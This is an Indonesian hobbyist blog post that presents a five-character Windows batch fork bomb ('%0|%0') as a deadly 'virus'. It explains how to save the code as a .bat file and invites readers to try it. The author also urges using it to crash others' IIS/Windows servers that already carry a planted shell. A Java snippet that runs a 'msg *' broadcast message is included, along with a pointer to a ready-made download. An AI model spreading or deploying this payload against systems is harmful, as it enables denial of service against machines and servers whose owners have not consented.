Recent Comments

Space For Ads

Space For Ads

Rabu, 20 November 2013

Bikin hang windows hanya dengan 5 karakter (just 5 bytes of file)


Maaf kalo ini repost saya pun juga lupa kalo saya pernah baca ini dimana intinya LUPA..
Setahu saya ini merupakan  virus yang sedikit simple tapi cukup mematikan,.. :D

okee, langsung sajaaa..
Code:
%0|%0

ketik code tersebut di notepad dengan nama terserah anda.bat (harus menggunakan ekstensi .bat) terus kalo yang berani silahkan di coba.. Saya sendiri sih pernah coba dan komputer/laptop anda akan bawel dengan muncul nya memory peringatan 0x? yang error setiap saat, akibat selanjut nya saya sendiri juga kurang tahuu,.. :))


untuk pengembangannya silahkan digabung sama coding VB, C, Java, Perl, PHP, dan lain2 .. tentunya .BAT juga ..
buat yang hobi ngancurin server orang .. kalo nemu server IIS/windows yang udah ditanemin shell coba aja pake ini .. mungkin si server lgsng !CRASH! hehehehe





Code: 
import java.io.*;
public class ffaaddiill {
   static String m = "cmd /C msg * shinobi_master_was_here";
   public static void main(String []args)throws IOException {
      ffaaddiill zombie = new ffaaddiill();
      Runtime.getRuntime().exec(zombie.m);
   }
}


buat yg males nulis program nya.. monggo lgs sedot aja.. 

0 komentar:

Posting Komentar